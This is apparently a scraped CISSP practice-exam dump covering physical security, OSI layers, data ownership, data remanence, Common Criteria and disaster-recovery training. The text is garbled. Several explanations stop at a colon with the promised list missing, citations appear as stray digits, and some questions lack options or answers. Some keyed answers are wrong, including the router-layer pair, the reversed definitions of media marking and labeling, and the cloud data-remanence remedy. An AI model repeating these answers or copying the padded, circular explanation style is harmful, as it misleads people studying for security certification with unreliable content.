After acquiring the latest security updates, the best practice is to install the patches on a test system before deploying them to the production systems. This is to ensure that the patches are compatible with the system configuration and do not cause any adverse effects or conflicts with the existing applications or services. The test system should be isolated from the production environment and should have the same or similar specifications and settings as the production system.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6, page 336; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 6, page 297
Which of the following is the PRIMARY reason for employing physical security personnel at entry points in facilities where card access is in operation?
To verify that only employees have access to the facility.
To identify present hazards requiring remediation.
To monitor staff movement throughout the facility.
To provide a safe environment for employees.
According to the CISSP CBK Official Study Guide, the primary reason for employing physical security personnel at entry points in facilities where card access is in operation is to provide a safe environment for employees. Physical security personnel are the human or the personnel components or elements of the physical security system or the network, which is the system or the network that prevents or deters the unauthorized or unintended access or entry to the resources, data, or information, such as the locks, keys, doors, or windows of the premises or the facilities, or the badges, cards, or tags of the subjects or the entities. Physical security personnel may perform various functions or tasks, such as the guarding, patrolling, or monitoring of the premises or the facilities, or the verifying, identifying, or authenticating of the subjects or the entities. Employing physical security personnel at entry points in facilities where card access is in operation helps to provide a safe environment for employees, as it enhances or supplements the security or the protection of the premises or the facilities, as well as the resources, data, or information that are contained or stored in the premises or the facilities, by adding or applying an additional layer or level of security or protection, as well as a human or a personal touch or factor, to the physical security system or the network. Providing a safe environment for employees helps to ensure the safety or the well-being of the employees, as well as the productivity or the performance of the employees, as it reduces or eliminates the risks or the threats that may harm or damage the employees, such as the theft, vandalism, or violence of the employees. To verify that only employees have access to the facility is not the primary reason for employing physical security personnel at entry points in facilities where card access is in operation, although it may be a benefit or a consequence of employing physical security personnel at entry points in facilities where card access is in operation. Verifying that only employees have access to the facility is the process of checking or confirming that the subjects or the entities that enter or access the facility are the employees or the authorized users or clients of the facility, by using or applying the appropriate methods or mechanisms, such as the card access, the biometrics, or the physical security personnel of the facility. Verifying that only employees have access to the facility helps to ensure the security or the integrity of the facility, as well as the resources, data, or information that are contained or stored in the facility, as it prevents or limits the unauthorized or unintended access or entry to the facility, which may lead to the attacks or threats that may harm or damage the facility, such as the theft, vandalism, or violence of the facility. Verifying that only employees have access to the facility may be a benefit or a consequence of employing physical security personnel at entry points in facilities where card access is in operation, as physical security personnel may perform the function or the task of verifying, identifying, or authenticating the subjects or the entities that enter or access the facility, by using or applying the card access, the biometrics, or other methods or mechanisms of the facility. However, verifying that only employees have access to the facility is not the primary reason for employing physical security personnel at entry points in facilities where card access is in operation, as it is not the main or the most important reason or objective for employing physical security personnel at entry points in facilities where card access is in operation. To identify present hazards requiring remediation is not the primary reason for employing physical security personnel at entry points in facilities where card access is in operation, although it may be a benefit or a consequence of employing physical security personnel at entry points in facilities where card access is in operation. Identifying present hazards requiring remediation is the process of detecting or discovering the existing or the current hazards or dangers that may affect or impair the facility, as well as the resources, data, or information that are contained or stored in the facility, such as the fire, flood, or earthquake of the facility, as well as the actions or the measures that are needed or required to fix or resolve the hazards or dangers, such as the evacuation, recovery, or contingency of the facility. Identifying present hazards requiring remediation helps to ensure the safety or the well-being of the facility, as well as the resources, data, or information that are contained or stored in the facility, as it reduces or eliminates the impact or the consequence of the hazards or dangers that may harm or damage the facility, such as the fire, flood, or earthquake of the facility. Identifying present hazards requiring remediation may be a benefit or a consequence of employing physical security personnel at entry points in facilities where card access is in operation, as physical security personnel may perform the function or the task of detecting or discovering the existing or the current hazards or dangers that may affect or impair the facility, as well as the actions or the measures that are needed or required to fix or resolve the hazards or dangers, by using or applying the appropriate tools or techniques, such as the sensors, alarms, or cameras of the facility. However, identifying present hazards requiring remediation is not the primary reason for employing physical security personnel at entry points in facilities where card access is in operation, as it is not the main or the most important reason or objective for employing physical security personnel at entry points in facilities where card access is in operation. To monitor staff movement throughout the facility is not the primary reason for employing physical security personnel at entry points in facilities where card access is in operation, although it may be a benefit or a consequence of employing physical security personnel at entry points in facilities where card access is in operation. Monitoring staff movement throughout the facility is the process of observing or tracking the activities or the behaviors of the staff or the employees that work or operate in the facility, such as the entry, exit, or location of the staff or the employees, by using or applying the appropriate methods or mechanisms, such as the card access, the biometrics, or the physical security personnel of the facility. Monitoring staff movement throughout the facility helps to ensure the security or the integrity of the facility, as well as the resources, data, or information that are contained or stored in the facility, as it prevents or limits the unauthorized or unintended access or entry to the facility, which may lead to the attacks or threats that may harm or damage the facility, such as the theft, vandalism, or violence of the facility. Monitoring staff movement throughout the facility may also help to ensure the productivity or the performance of the staff or the employees, as it prevents or limits the misuse or abuse of the facility, such as the idle, waste, or fraud of the facility. Monitoring staff movement throughout the facility may be a benefit or a consequence of employing physical security personnel at entry points in facilities where card access is in operation, as physical security personnel may perform the function or the task of observing or tracking the activities or the behaviors of the staff or the employees that work or operate in the facility, by using or applying the card access, the biometrics, or other methods or mechanisms of the facility. However, monitoring staff movement throughout the facility is not the primary reason for employing physical security personnel at entry points in facilities where card access is in operation, as it is not the main or the most important reason or objective for employing physical security personnel at entry points in facilities where card access is in operation.
Between which pair of Open System Interconnection (OSI) Reference Model layers are routers used as a communications device?
Transport and Session
Data-Link and Transport
Network and Session
Physical and Data-Link
According to the CISSP CBK Official Study Guide1, routers are used as a communications device between the network and session layers of the Open System Interconnection (OSI) Reference Model. The OSI Reference Model is a conceptual framework or a standard that defines the functions and processes of the communication or the networking system, which consists of seven layers, which are:
Routers are used as a communications device between the network and session layers of the OSI Reference Model, as they perform the functions or the tasks that are related to the network and session layers, such as:
Transport and session is not the pair of OSI Reference Model layers between which routers are used as a communications device, as routers do not perform the functions or the tasks that are related to the transport layer of the OSI Reference Model, such as ensuring or verifying the delivery or the transmission of the data or the information, based on the segments, ports, or protocols, such as the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) protocols, which are defined or specified at the transport layer of the OSI Reference Model. Data-Link and transport is not the pair of OSI Reference Model layers between which routers are used as a communications device, as routers do not perform the functions or the tasks that are related to the data-link layer of the OSI Reference Model, such as organizing or controlling the data or the information, based on the frames, addresses, or protocols, such as the Media Access Control (MAC) addresses or the Ethernet protocols, which are defined or specified at the data-link layer of the OSI Reference Model. Physical and data-link is not the pair of OSI Reference Model layers between which routers are used as a communications device, as routers do not perform the functions or the tasks that are related to the physical layer of the OSI Reference Model, such as transmitting or receiving the data or the information, based on the cables, connectors, or signals, which are defined or specified at the physical layer of the OSI Reference Model. References: 1
Which of the following roles has the obligation to ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization?
Data Custodian
Data Owner
Data Creator
Data User
The role that has the obligation to ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization is the data owner. A data owner is a person or an entity that has the authority or the responsibility for the data or the information within an organization, and that determines or defines the classification, the usage, the protection, or the retention of the data or the information. A data owner has the obligation to ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization, as the data owner is ultimately accountable or liable for the security or the quality of the data or the information, regardless of who processes or handles the data or the information. A data owner can ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization, by performing the tasks or the functions such as conducting due diligence, establishing service level agreements, defining security requirements, monitoring performance, or auditing compliance. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2, page 61; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 2, page 67
A company has decided that they need to begin maintaining assets deployed in the enterprise. What approach should be followed to determine and maintain ownership information to bring the company into compliance?
Enterprise asset management framework
Asset baseline using commercial off the shelf software
Asset ownership database using domain login records
A script to report active user logins on assets
According to the CISSP CBK Official Study Guide1, the approach that should be followed to determine and maintain ownership information to bring the company into compliance is the enterprise asset management framework. An enterprise asset management framework is a set of principles, processes, and practices that are used or applied to manage or control the assets or the resources that are deployed or utilized in the enterprise or the organization, such as the hardware, software, data, or information of the enterprise or the organization. An enterprise asset management framework helps to ensure the security or the integrity of the enterprise or the organization, as well as the assets or the resources that are deployed or utilized in the enterprise or the organization, by enforcing or implementing the policies, procedures, or standards that govern or regulate the identification, classification, ownership, valuation, allocation, utilization, maintenance, protection, or disposal of the assets or the resources of the enterprise or the organization. An enterprise asset management framework also helps to ensure the compliance or the conformity of the enterprise or the organization, as well as the assets or the resources that are deployed or utilized in the enterprise or the organization, by adhering or conforming to the laws, regulations, or requirements that apply or relate to the assets or the resources of the enterprise or the organization, such as the legal, contractual, or ethical obligations or responsibilities of the enterprise or the organization. Following an enterprise asset management framework helps to determine and maintain ownership information to bring the company into compliance, as it provides or supports a systematic or a structured approach or method to identify or assign the owners or the custodians of the assets or the resources of the enterprise or the organization, as well as to document or record the ownership information or the details of the assets or the resources of the enterprise or the organization, such as the name, description, location, status, or value of the assets or the resources of the enterprise or the organization. Determining and maintaining ownership information helps to bring the company into compliance, as it ensures or verifies the accountability or the responsibility of the owners or the custodians of the assets or the resources of the enterprise or the organization, as well as the accuracy, completeness, or consistency of the ownership information or the details of the assets or the resources of the enterprise or the organization, which may help to avoid or prevent the disputes, conflicts, or issues that may arise or occur regarding the assets or the resources of the enterprise or the organization, such as the theft, loss, misuse, or abuse of the assets or the resources of the enterprise or the organization. Asset baseline using commercial off the shelf software is not the approach that should be followed to determine and maintain ownership information to bring the company into compliance, although it may be a benefit or a consequence of following an enterprise asset management framework. An asset baseline is a reference or a standard that is used or applied to measure or compare the performance or the quality of the assets or the resources of the enterprise or the organization, by using or applying the appropriate metrics or indicators, such as the availability, reliability, or efficiency of the assets or the resources of the enterprise or the organization. Commercial off the shelf software is a type of software that is readily available or accessible in the market or the industry, which can be purchased or acquired by the enterprise or the organization, without requiring or involving any customization or modification of the software, such as the operating systems, applications, or utilities of the software. Using commercial off the shelf software helps to create or establish an asset baseline, as it provides or supports a common or a consistent platform or tool to collect or analyze the data or the information that are related or relevant to the performance or the quality of the assets or the resources of the enterprise or the organization, such as the usage, configuration, or status of the assets or the resources of the enterprise or the organization. Creating or establishing an asset baseline helps to manage or control the assets or the resources of the enterprise or the organization, as it enables or facilitates the monitoring, evaluation, or improvement of the performance or the quality of the assets or the resources of the enterprise or the organization, by using or applying the appropriate methods or mechanisms, such as the reporting, auditing, or optimization of the assets or the resources of the enterprise or the organization. However, using commercial off the shelf software to create or establish an asset baseline is not the approach that should be followed to determine and maintain ownership information to bring the company into compliance, as it does not address or target the identification, documentation, or verification of the owners or the custodians of the assets or the resources of the enterprise or the organization, which are the essential or the fundamental components or elements of the ownership information or the details of the assets or the resources of the enterprise or the organization. Asset ownership database using domain login records is not the approach that should be followed to determine and maintain ownership information to bring the company into compliance, although it may be a benefit or a consequence of following an enterprise asset management framework. An asset ownership database is a repository or a storage that is used or applied to store or maintain the ownership information or the details of the assets or the resources of the enterprise or the organization, such as the name, description, location, status, or value of the assets or the resources of the enterprise or the organization. A domain login record is a record or a log that is used or applied to record or document the login or the access of the users or the employees to the domain or the network of the enterprise or the organization, such as the username, password, date, time, or duration of the login or the access of the users or the employees to the domain or the network of the enterprise or the organization. Using domain login records helps to create or establish an asset ownership database, as it provides or supports a source or a basis to identify or assign the owners or the custodians of the assets or the resources of the enterprise or the organization, as well as to document or record the ownership information or the details of the assets or the resources of the enterprise or the organization, based on the login or the access of the users or the employees to the domain or the network of the enterprise or the organization, which may indicate or reflect the usage, configuration, or status of the assets or the resources of the enterprise or the organization. However, using domain login records to create or establish an asset ownership database is not the approach that should be followed to determine and maintain ownership information to bring the company into compliance, as it does not provide or support a comprehensive or a complete approach or method to identify or assign the owners or the custodians of the assets or the resources of the enterprise or the organization, as well as to document or record the ownership information or the details of the assets or the resources of the enterprise or the organization, as it may not cover or include all the assets or the resources of the enterprise or the organization, or all the users or the employees of the enterprise or the organization, which may lead to the gaps, errors, or inconsistencies in the ownership information or the details of the assets or the resources of the enterprise or the organization. A script to report active user logins on assets is not the approach that should be followed to determine and maintain ownership information to bring the company into compliance, although it may be a benefit or a consequence of following an enterprise asset management framework. A script is a program or a code that is used or applied to perform or execute a specific or a particular function or task in the system or the network, by using or applying the appropriate commands or instructions, such as the batch, shell, or PowerShell commands or instructions of the system or the network. Reporting active user logins on assets is the process of generating or producing a report or a document that shows or displays the active or the current user logins or accesses to the assets or the resources of the enterprise or the organization, such as the username, password, date, time, or duration of the user logins or accesses to the assets or the resources of the enterprise or the organization. Using a script helps to report active user logins on assets, as it provides or supports a fast or an efficient way or method to collect or analyze the data or the information that are related or relevant to the active or the current user logins or accesses to the assets or the resources of the enterprise or the organization, by using or applying the appropriate commands or instructions, such as the batch, shell, or PowerShell commands or instructions of the system or the network. Reporting active user logins on assets helps to manage or control the assets or the resources of the enterprise or the organization, as it enables or facilitates the monitoring, evaluation, or improvement of the usage, configuration, or status of the assets or the resources of the enterprise or the organization, by using or applying the appropriate methods or mechanisms, such as the reporting, auditing, or optimization of the assets or the resources of the enterprise or the organization. However, using a script to report active user logins on assets is not the approach that should be followed to determine and maintain ownership information to bring the company into compliance, as it does not address or target the identification, documentation, or verification of the owners or the custodians of the assets or the resources of the enterprise or the organization, which are the essential or the fundamental components or elements of the ownership information or the details of the assets or the resources of the enterprise or the organization.
Which of the following entities is ultimately accountable for data remanence vulnerabilities with data replicated by a cloud service provider?
Data owner
Data steward
Data custodian
Data processor
The entity that is ultimately accountable for data remanence vulnerabilities with data replicated by a cloud service provider is the data owner. A data owner is a person or an entity that has the authority or the responsibility for the data or the information within an organization, and that determines or defines the classification, the usage, the protection, or the retention of the data or the information. A data owner has the obligation to ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization, as the data owner is ultimately accountable or liable for the security or the quality of the data or the information, regardless of who processes or handles the data or the information. A data owner can ensure that a third party provider is capable of processing and handling data in a secure manner and meeting the standards set by the organization, by performing the tasks or the functions such as conducting due diligence, establishing service level agreements, defining security requirements, monitoring performance, or auditing compliance. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2, page 61; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 2, page 67
Which security approach will BEST minimize Personally Identifiable Information (PII) loss from a data breach?
A strong breach notification process
Limited collection of individuals' confidential data
End-to-end data encryption for data in transit
Continuous monitoring of potential vulnerabilities
The best security approach to minimize PII loss from a data breach is to limit the collection of individuals’ confidential data to the minimum necessary for the business purpose. This is based on the principle of data minimization, which is one of the core principles of privacy by design. By collecting less PII, the organization reduces the amount of data that could be exposed or compromised in a data breach, and thus lowers the potential impact and liability. The other options are not the best security approach, but rather complementary or reactive measures. A strong breach notification process is important to inform the affected individuals and authorities about the data breach, but it does not prevent or minimize the loss of PII. End-to-end data encryption for data in transit is a good practice to protect the confidentiality and integrity of data, but it does not address the data at rest or in use, and it may not prevent unauthorized access if the encryption keys are compromised. Continuous monitoring of potential vulnerabilities is a proactive measure to identify and remediate security weaknesses, but it does not eliminate the possibility of a data breach, and it does not reduce the amount of PII collected or stored. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, p. 114; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, p. 289; CISSP practice exam questions and answers, Question 6.
Which Radio Frequency Interference (RFI) phenomenon associated with bundled cable runs can create information leakage?
Transference
Covert channel
Bleeding
Cross-talk
Cross-talk is a type of Radio Frequency Interference (RFI) phenomenon that occurs when signals from one cable or circuit interfere with signals from another cable or circuit. Cross-talk can create information leakage by allowing an attacker to eavesdrop on or modify the transmitted data. Cross-talk can be caused by electromagnetic induction, capacitive coupling, or common impedance coupling. Cross-talk can be reduced by using shielded cables, twisted pairs, or optical fibers123. References:
Disaster Recovery Plan (DRP) training material should be
consistent so that all audiences receive the same training.
stored in a fire proof safe to ensure availability when needed.
only delivered in paper format.
presented in a professional looking manner.
Disaster Recovery Plan (DRP) training material should be consistent so that all audiences receive the same training. A DRP is a document that outlines the procedures and actions to be taken in the event of a disaster that disrupts the normal operations of an organization. A DRP training material is a document that provides the instructions and guidance for the staff and stakeholders to learn and practice the DRP. The DRP training material should be consistent so that all audiences receive the same training, regardless of their roles, responsibilities, or locations. This can ensure that the DRP is understood, followed, and executed correctly and effectively by everyone involved. The other options are not the best characteristics of a DRP training material, but rather secondary or irrelevant factors. Storing the DRP training material in a fire proof safe to ensure availability when needed is a good practice, but not a requirement, as the DRP training material can also be stored in other secure and accessible locations, such as online or offsite. Delivering the DRP training material only in paper format is a limitation, not a benefit, as the DRP training material can also be delivered in other formats, such as electronic or audiovisual, to suit the preferences and needs of the audiences. Presenting the DRP training material in a professional looking manner is a nice touch, but not a priority, as the DRP training material can also be presented in a simple or informal manner, as long as it is clear, concise, and accurate. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, p. 387; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7, p. 412.
Application of which of the following Institute of Electrical and Electronics Engineers (IEEE) standards will prevent an unauthorized wireless device from being attached to a network?
IEEE 802.1F
IEEE 802.1H
IEEE 802.1Q
IEEE 802.1X
IEEE 802.1X is a standard for port-based Network Access Control (PNAC). It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN, preventing unauthorized devices from gaining network access.
References: CISSP For Dummies, Seventh Edition, Chapter 4, page 97; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, page 247
What does an organization FIRST review to assure compliance with privacy requirements?
Best practices
Business objectives
Legal and regulatory mandates
Employee's compliance to policies and standards
The first thing that an organization reviews to assure compliance with privacy requirements is the legal and regulatory mandates that apply to its business operations and data processing activities. Legal and regulatory mandates are the laws, regulations, standards, and contracts that govern how an organization must protect the privacy of personal information and the rights of data subjects. An organization must identify and understand the relevant mandates that affect its jurisdiction, industry, and data types, and implement the appropriate controls and measures to comply with them. The other options are not the first thing that an organization reviews, but rather part of the privacy compliance program. Best practices are the recommended methods and techniques for achieving privacy objectives, but they are not mandatory or binding. Business objectives are the goals and strategies that an organization pursues to create value and competitive advantage, but they may not align with privacy requirements. Employee’s compliance to policies and standards is the degree to which the organization’s staff adhere to the internal rules and guidelines for privacy protection, but it is not a review activity, but rather a measurement and enforcement activity. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, p. 105; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, p. 287.
Data remanence refers to which of the following?
The remaining photons left in a fiber optic cable after a secure transmission.
The retention period required by law or regulation.
The magnetic flux created when removing the network connection from a server or personal computer.
The residual information left on magnetic storage media after a deletion or erasure.
Data remanence refers to the residual information left on magnetic storage media after a deletion or erasure. Data remanence is a security risk, as it may allow unauthorized or malicious parties to recover the deleted or erased data, which may contain sensitive or confidential information. Data remanence can be caused by the physical properties of the magnetic storage media, such as hard disks, floppy disks, or tapes, which may retain some traces of the data even after it is overwritten or formatted. Data remanence can also be caused by the logical properties of the file systems or operating systems, which may not delete or erase the data completely, but only mark the space as available or remove the pointers to the data. Data remanence can be prevented or reduced by using secure deletion or erasure methods, such as cryptographic wiping, degaussing, or physical destruction56 References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Security Operations, p. 443; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 7: Security Operations, p. 855.
The BEST example of the concept of "something that a user has" when providing an authorized user access to a computing system is
the user's hand geometry.
a credential stored in a token.
a passphrase.
the user's face.
What is the difference between media marking and media labeling?
Media marking refers to the use of human-readable security attributes, while media labeling refers to the use of security attributes in internal data structures.
Media labeling refers to the use of human-readable security attributes, while media marking refers to the use of security attributes in internal data structures.
Media labeling refers to security attributes required by public policy/law, while media marking refers to security required by internal organizational policy.
Media marking refers to security attributes required by public policy/law, while media labeling refers to security attributes required by internal organizational policy.
According to the CISSP CBK Official Study Guide1, the difference between media marking and media labeling is that media labeling refers to the use of human-readable security attributes, while media marking refers to the use of security attributes in internal data structures. Media marking and media labeling are two methods or techniques of applying security attributes to the media, which are the physical or tangible devices or materials that store or contain the data or information, such as the disks, tapes, or papers. Security attributes are the tags or markers that indicate the classification, sensitivity, or clearance of the media, data, or information, such as top secret, secret, or confidential. Security attributes help to protect the media, data, or information from unauthorized or unintended access, disclosure, modification, corruption, loss, or theft, as well as to support the access control and audit mechanisms. Media labeling is the method or technique of applying security attributes to the media in a human-readable form, such as the words, symbols, or colors that are printed, stamped, or affixed on the media. Media labeling helps to identify and distinguish the media, data, or information based on their security attributes, as well as to inform and instruct the users or handlers of the media, data, or information about the proper and secure handling and disposal of them. Media marking is the method or technique of applying security attributes to the media in an internal data structure form, such as the bits, bytes, or fields that are embedded, encoded, or encrypted in the media. Media marking helps to verify and validate the media, data, or information based on their security attributes, as well as to enforce and monitor the access control and audit mechanisms for them. Media marking refers to security attributes required by public policy/law, while media labeling refers to security required by internal organizational policy is not the difference between media marking and media labeling, as it is not related to the form or format of the security attributes, but to the source or authority of the security attributes. Media marking and media labeling may both refer to security attributes required by public policy/law, such as the Controlled Unclassified Information (CUI) or the Personal Identifiable Information (PII), or to security attributes required by internal organizational policy, such as the proprietary or confidential information. The difference between media marking and media labeling is not based on who or what requires the security attributes, but on how the security attributes are applied or represented on the media.
When designing a vulnerability test, which one of the following is likely to give the BEST indication of what components currently operate on the network?
Topology diagrams
Mapping tools
Asset register
Ping testing
According to the CISSP All-in-One Exam Guide2, when designing a vulnerability test, mapping tools are likely to give the best indication of what components currently operate on the network. Mapping tools are software applications that scan and discover the network topology, devices, services, and protocols. They can provide a graphical representation of the network structure and components, as well as detailed information about each node and connection. Mapping tools can help identify potential vulnerabilities and weaknesses in the network configuration and architecture, as well as the exposure and attack surface of the network. Topology diagrams are not likely to give the best indication of what components currently operate on the network, as they may be outdated, inaccurate, or incomplete. Topology diagrams are static and abstract representations of the network layout and design, but they may not reflect the actual and dynamic state of the network. Asset register is not likely to give the best indication of what components currently operate on the network, as it may be outdated, inaccurate, or incomplete. Asset register is a document that lists and categorizes the assets owned by an organization, such as hardware, software, data, and personnel. However, it may not capture the current status, configuration, and interconnection of the assets, as well as the changes and updates that occur over time. Ping testing is not likely to give the best indication of what components currently operate on the network, as it is a simple and limited technique that only checks the availability and response time of a host. Ping testing is a network utility that sends an echo request packet to a target host and waits for an echo reply packet. It can measure the connectivity and latency of the host, but it cannot provide detailed information about the host’s characteristics, services, and vulnerabilities. References: 2
Which of the following is the PRIMARY reason to perform regular vulnerability scanning of an organization network?
Provide vulnerability reports to management.
Validate vulnerability remediation activities.
Prevent attackers from discovering vulnerabilities.
Remediate known vulnerabilities.
According to the CISSP Official (ISC)2 Practice Tests, the primary reason to perform regular vulnerability scanning of an organization network is to remediate known vulnerabilities. A vulnerability scanning is the process of identifying and measuring the weaknesses and exposures in a system, network, or application, that may be exploited by threats and cause harm to the organization or its assets. A vulnerability scanning can be performed by using various tools, techniques, or methods, such as automated scanners, manual tests, or penetration tests. The primary reason to perform regular vulnerability scanning of an organization network is to remediate known vulnerabilities, which means to fix, mitigate, or eliminate the vulnerabilities that are discovered or reported by the vulnerability scanning. Remediation of known vulnerabilities helps to improve the security posture and effectiveness of the system, network, or application, as well as to reduce the overall risk to an acceptable level. Providing vulnerability reports to management is not the primary reason to perform regular vulnerability scanning of an organization network, although it may be a benefit or outcome of it. Vulnerability reports are the documents that provide the evidence and analysis of the vulnerability scanning, such as the scope, objectives, methods, results, and recommendations of the vulnerability scanning. Vulnerability reports help to communicate and document the findings and issues of the vulnerability scanning, as well as to support the decision making and planning for the remediation of the vulnerabilities. Validating vulnerability remediation activities is not the primary reason to perform regular vulnerability scanning of an organization network, although it may be a part or step of it. Validating vulnerability remediation activities is the process of verifying and testing the effectiveness and completeness of the remediation actions that are taken to address the vulnerabilities, such as patching, updating, configuring, or replacing the system, network, or application components. Validating vulnerability remediation activities helps to ensure that the vulnerabilities are properly and successfully remediated, and that no new or residual vulnerabilities are introduced or left behind. Preventing attackers from discovering vulnerabilities is not the primary reason to perform regular vulnerability scanning of an organization network, although it may be a benefit or outcome of it. Preventing attackers from discovering vulnerabilities is the process of hiding or obscuring the vulnerabilities from the potential attackers, by using various techniques or methods, such as encryption, obfuscation, or deception. Preventing attackers from discovering vulnerabilities helps to reduce the likelihood and opportunity of the attackers to exploit the vulnerabilities, but it does not address the root cause or the impact of the vulnerabilities.
An organization lacks a data retention policy. Of the following, who is the BEST person to consult for such requirement?
Application Manager
Database Administrator
Privacy Officer
Finance Manager
The best person to consult for a data retention policy requirement is the privacy officer, who is responsible for ensuring that the organization complies with the applicable privacy laws, regulations, and standards. A data retention policy defines the criteria and procedures for retaining, storing, and disposing of data, especially personal data, in accordance with the legal and business requirements. The privacy officer can advise on the data retention policy by identifying the relevant privacy mandates, assessing the data types and categories, determining the retention periods and disposal methods, and implementing the appropriate controls and measures. The other options are not the best person to consult, but rather stakeholders or contributors to the data retention policy. An application manager is responsible for managing the development, maintenance, and operation of applications, but not the data retention policy. A database administrator is responsible for managing the design, implementation, and performance of databases, but not the data retention policy. A finance manager is responsible for managing the financial resources and activities of the organization, but not the data retention policy. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, p. 118; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, p. 292; CISSP practice exam questions and answers, Question 8.
The PRIMARY characteristic of a Distributed Denial of Service (DDoS) attack is that it
exploits weak authentication to penetrate networks.
can be detected with signature analysis.
looks like normal network activity.
is commonly confused with viruses or worms.
The primary characteristic of a Distributed Denial of Service (DDoS) attack is that it looks like normal network activity. A DDoS attack is a type of attack or a threat that aims or intends to disrupt or to degrade the availability or the performance of a system or a service, by overwhelming or flooding the system or the service with a large amount or a high volume of traffic or requests, from multiple or distributed sources or locations, such as the compromised or infected computers, devices, or networks, that are controlled or coordinated by the attacker or the malicious actor. The primary characteristic of a DDoS attack is that it looks like normal network activity, which means that it is difficult or challenging to detect or to prevent the DDoS attack, as it is hard or impossible to distinguish or to differentiate the legitimate or the authentic traffic or requests from the illegitimate or the malicious traffic or requests, and as it is hard or impossible to block or to filter the illegitimate or the malicious traffic or requests, without affecting or impacting the legitimate or the authentic traffic or requests. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4, page 115; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 4, page 172
Which of the following BEST avoids data reminisce disclosure for cloud hosted resources?
Strong encryption and deletion of the keys after data is deleted.
Strong encryption and deletion of the virtual host after data is deleted.
Software based encryption with two factor authentication.
Hardware based encryption on dedicated physical servers.
The best way to avoid data reminisce disclosure for cloud hosted resources is to use strong encryption and delete the virtual host after data is deleted. Data reminisce is the residual data that remains on the storage media after the data is deleted or overwritten. Data reminisce can pose a risk of data leakage or unauthorized access if the storage media is reused, recycled, or disposed of without proper sanitization. By using strong encryption, the data is protected from unauthorized decryption even if the data reminisce is recovered. By deleting the virtual host, the data is removed from the cloud provider’s infrastructure and the storage media is released from the allocation pool.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 282; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, page 247
Which of the following BEST describes the purpose of the security functional requirements of Common Criteria?
Level of assurance of the Target of Evaluation (TOE) in intended operational environment
Selection to meet the security objectives stated in test documents
Security behavior expected of a TOE
Definition of the roles and responsibilities
The security functional requirements of Common Criteria are meant to describe the expected security behavior of a Target of Evaluation (TOE). These requirements are detailed and are used to evaluate the security functions that a TOE claims to implement.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4, page 211; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 4, page 178
Which of the following is the MOST important goal of information asset valuation?
Developing a consistent and uniform method of controlling access on information assets
Developing appropriate access control policies and guidelines
Assigning a financial value to an organization’s information assets
Determining the appropriate level of protection
According to the CISSP All-in-One Exam Guide2, the most important goal of information asset valuation is to assign a financial value to an organization’s information assets. Information asset valuation is the process of estimating the worth or importance of the information assets that an organization owns, creates, uses, or maintains, such as data, documents, records, or intellectual property. Information asset valuation helps the organization to measure the impact and return of its information assets, as well as to determine the appropriate level of protection, investment, and management for them. Information asset valuation also helps the organization to comply with the legal, regulatory, and contractual obligations that may require the disclosure or reporting of the value of its information assets. Developing a consistent and uniform method of controlling access on information assets is not the most important goal of information asset valuation, although it may be a benefit or outcome of it. Controlling access on information assets is the process of granting or denying the rights and permissions to access, use, modify, or disclose the information assets, based on the identity, role, or need of the users or processes. Controlling access on information assets helps the organization to protect the confidentiality, integrity, and availability of its information assets, as well as to enforce the security policies and standards for them. Developing appropriate access control policies and guidelines is not the most important goal of information asset valuation, although it may be a benefit or outcome of it. Access control policies and guidelines are the documents that define the rules, principles, and procedures for controlling access on information assets, as well as the roles and responsibilities of the stakeholders involved. Access control policies and guidelines help the organization to establish and communicate the expectations and requirements for controlling access on information assets, as well as to monitor and audit the compliance and effectiveness of the access control mechanisms. Determining the appropriate level of protection is not the most important goal of information asset valuation, although it may be a benefit or outcome of it. The level of protection is the degree or extent of the security measures and controls that are applied to the information assets, to prevent or mitigate the potential threats and risks that may affect them. The level of protection should be proportional to the value and sensitivity of the information assets, as well as the impact and likelihood of the threats and risks. References: 2
During the risk assessment phase of the project the CISO discovered that a college within the University is collecting Protected Health Information (PHI) data via an application that was developed in-house. The college collecting this data is fully aware of the regulations for Health Insurance Portability and Accountability Act (HIPAA) and is fully compliant.
What is the best approach for the CISO?
Below are the common phases to creating a Business Continuity/Disaster Recovery (BC/DR) plan. Drag the remaining BC\DR phases to the appropriate corresponding location.
The common phases to creating a Business Continuity/Disaster Recovery (BC/DR) plan are as follows:
The image that you sent shows a flowchart or process diagram with five empty boxes connected by arrows, indicating a sequence of steps. The boxes are placeholders for the phases of the BC/DR plan. Below the image, there is a list of the phases of the BC/DR plan. To complete the image, you need to drag the phases from the list to the appropriate boxes in the diagram. The correct order of the phases is as follows:
The phase of Plan Maintenance is not shown in the image, but it is an ongoing and continuous phase that should be performed after the completion of the other phases.
A proxy firewall operates at what layer of the Open System Interconnection (OSI) model?
Transport
Data link
Network
Application
